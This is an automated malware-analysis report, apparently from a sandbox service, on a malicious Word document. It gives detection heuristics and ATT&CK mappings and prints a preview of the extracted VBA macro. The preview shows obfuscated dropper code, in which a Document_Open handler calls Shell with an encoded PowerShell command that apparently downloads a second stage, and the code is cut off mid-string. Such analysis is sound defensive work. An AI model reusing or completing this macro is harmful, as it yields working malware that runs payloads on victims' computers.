MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the Document_Open event and utilizes the Shell() function to execute a command. This indicates the document is designed to download and execute a second-stage payload, consistent with a dropper malware.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6591589-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6591589-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14501 bytes |
SHA-256: 66253e10452835001cbf3ae9b87284b81b8bc04574d007684d611c25eebeda42 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MwmQJVCkpVlcb" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function kiijoHIOIrf() On Error Resume Next OzrinG = Tan(20131) iCcTSm = zSkSrA CzJjMS = CDbl(TJqMAC * CDbl(AbBik + Int(QUcHAj * Rnd(49402)) * aQMOz * Log(78219 * FhWLr - LslGR + Fix(51)))) vutfT = pEbrAi iWBfc = CDbl(QstdwD) UYErCY = Tan(20134) pJnCS = Tan(96879) Ynjjqi = kSzIIO TCzDU = CDbl(VKGfA * CDbl(ciuIMF + Int(QpHLMo * Rnd(69961)) * EmcisU * Log(60698 * TliEuR - jDfuG + Fix(51)))) raXhBv = baIhud LqlOkT = CDbl(YiwIc) KWjhY = Tan(15593) qpLMM = Tan(34848) dAPTaB = CHXSJY mFBWz = CDbl(liDUG * CDbl(BvpQiG + Int(MzWShV * Rnd(95142)) * YAJcUF * Log(98844 * jiDWwu - wvNlzt + Fix(51)))) FGlfj = SCZXU nUBCS = CDbl(husmk) OcojZW = Tan(131) jpdaw = Tan(18680) hawKBT = hNCCbB oGFJcM = CDbl(PqPzRE * CDbl(AXZcir + Int(iKbdQ * Rnd(43772)) * pXUtjB * Log(6299 * EKovz - kjKkP + Fix(51)))) WuSOn = tDudRs KwdjMp = CDbl(aTvGi) wsLJUQ = Tan(14252) kiijoHIOIrf = qpNnumc + VBA.Shell(uPsVGsutpU + Chr(ViGfhmcjGr + vbKeyP + wzNJJTpkPi) + "owers" + boCvXzpW + PaPPH + hBBzHZtXXjr + ORjpTU + cUdtwrjbw + JVNAEGo, 11152 - 11152) jiQsk = Tan(85867) ZtJbi = FnrRlD MjlWO = CDbl(NQYPSL * CDbl(LWFaZB + Int(Iidlr * Rnd(70157)) * dFLcr * Log(27501 * nlSdfH - JAdrPp + Fix(51)))) kmzut = zdAucu iDAfia = CDbl(KMmazw) SEztt = Tan(93129) LWozp = Tan(77561) iSwAj = wnqQR swvTwq = CDbl(uFDFC * CDbl(fonRCT + Int(CSCUzt * Rnd(25851)) * BpJdKD * Log(5571 * bbmREB - fMvRB + Fix(51)))) LqPBXB = WHDbM wbUEcq = CDbl(Ptcsfc) uXvkHV = Tan(91976) End Function Private Sub Document_open() On Error Resume Next XnEoO = Tan(78516) zAGhoN = kmkDl TzjYv = CDbl(mIZTQ * CDbl(QaDwXv + Int(QzsLj * Rnd(64922)) * JthkW * Log(1388 * nvqnwk - cUajq + Fix(51)))) diMIaK = nfSis VZbowq = CDbl(ItbpwP) pTVjU = Tan(29631) rKJdKP = Tan(39751) NUCqF = uitkj SuIrjn = CDbl(LhtJJE * CDbl(slEjU + Int(uRPKK * Rnd(36022)) * IZFmh * Log(90524 * KvOzM - EJnULs + Fix(51)))) DwWHXn = ldvzS AizjNS = CDbl(lcHbO) pWosVi = Tan(40424) kiijoHIOIrf KjapB = Tan(89247) JRQQwO = XLMjdA NmWncJ = CDbl(XjwOjp * CDbl(WBfJo + Int(tfGrYY * Rnd(54501)) * SjPoj * Log(79100 * dEppQs - hRBSYK + Fix(51)))) swqTXG = zopGz jiOEhj = CDbl(zjZAA) dwPbcS = Tan(50779) qlloB = Tan(93789) DwZali = iiicS YINpG = CDbl(vnjrp * CDbl(EQVww + Int(aVFiwW * Rnd(31860)) * ouYPFN * Log(76935 * sCuNih - HUEkRj + Fix(51)))) XSCjLt = wOrmwB qMrYY = CDbl(BOTlcU) LIDpz = Tan(59351) End Sub Attribute VB_Name = "EndRLrICqC" Function boCvXzpW() On Error Resume Next FfbjDv = Tan(3805) Buaas = CDbl(khbiL) qXIhk = Tan(68505) ztIqj = CDbl(fwwuki * CDbl(wsRBSN + Int(IFSiz * Rnd(57503)) * zXTjzU * Log(51840 * mTtUV - wkEJi + Fix(51)))) jzuMGn = ZjDwH JOqGzI = shKUOY VSJpSnzNkz = "HeLL ( [cHA" + "R[]](4 ,73" + " ,104 ,86,116,7" + "3 , 0,29" + " ,0" + " ,78 , 69 ,87 " + ", 13,79,6" + "6,74 ,69 ,67" NzZPl = Tan(96289) fBfLT = CDbl(HRDji) zsWXwj = Tan(20353) XYBzRL = CDbl(mrWra * CDbl(BirlI + Int(tNVtp * Rnd(61021)) * DHjHsn * Log(26504 * BqMzH - MLYth + Fix(51)))) QZLLt = OkoWG NqAnf = AIjCzA lFbYJnqHX = " ," + " 84 ,0 , " + "82,65 " + ", 78 ,68" + " ,7" + "9 ,77,27 " + ",4, 80," + "107 ,68," + " 75,101, " vuLlL = Tan(16881) KIrGM = CDbl(Oquiu) FAOPN = Tan(92305) OdXJsi = CDbl(NfCjdE * CDbl(DYdwjr + Int(SbMAAc * Rnd(59733)) * RLmuJ * Log(72002 * YkSDUv - aUMvjz + Fix(51)))) cApzL = jjwuH YztdcX = mAsoFw MEauIH = "66 ,0 , " + "29, 0 , 78 " + ",69 , " + "87, 13 ,79 ,6" + "6 , 74,69 ,67" + " , 84, 0,115 , " + "89 ," + " 83 ,84, 69, 77" + ", 1" zLKXiw = Tan(79697) vWFdo = CDbl(kAIjAU) EDZCi = Tan(52277) HMXls = CDbl(JBSTlJ * CDbl(KCfWEw + Int(wmQBf * Rnd(29433)) * UQSKFJ * Log(19326 * znmmPf - vIqndb + Fix(51)))) NcbzHm = jadAm DsjRj = WqHLs WiMJCrbEs = "4 ,110,69 ,84," + " 14,119, 69" + " ," + " 6" + "6 ,99, 76, " + "73" + ",69 , 78,84," + "27 ,4 , 73," + "66 , 7" + "9, 86 ,65 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.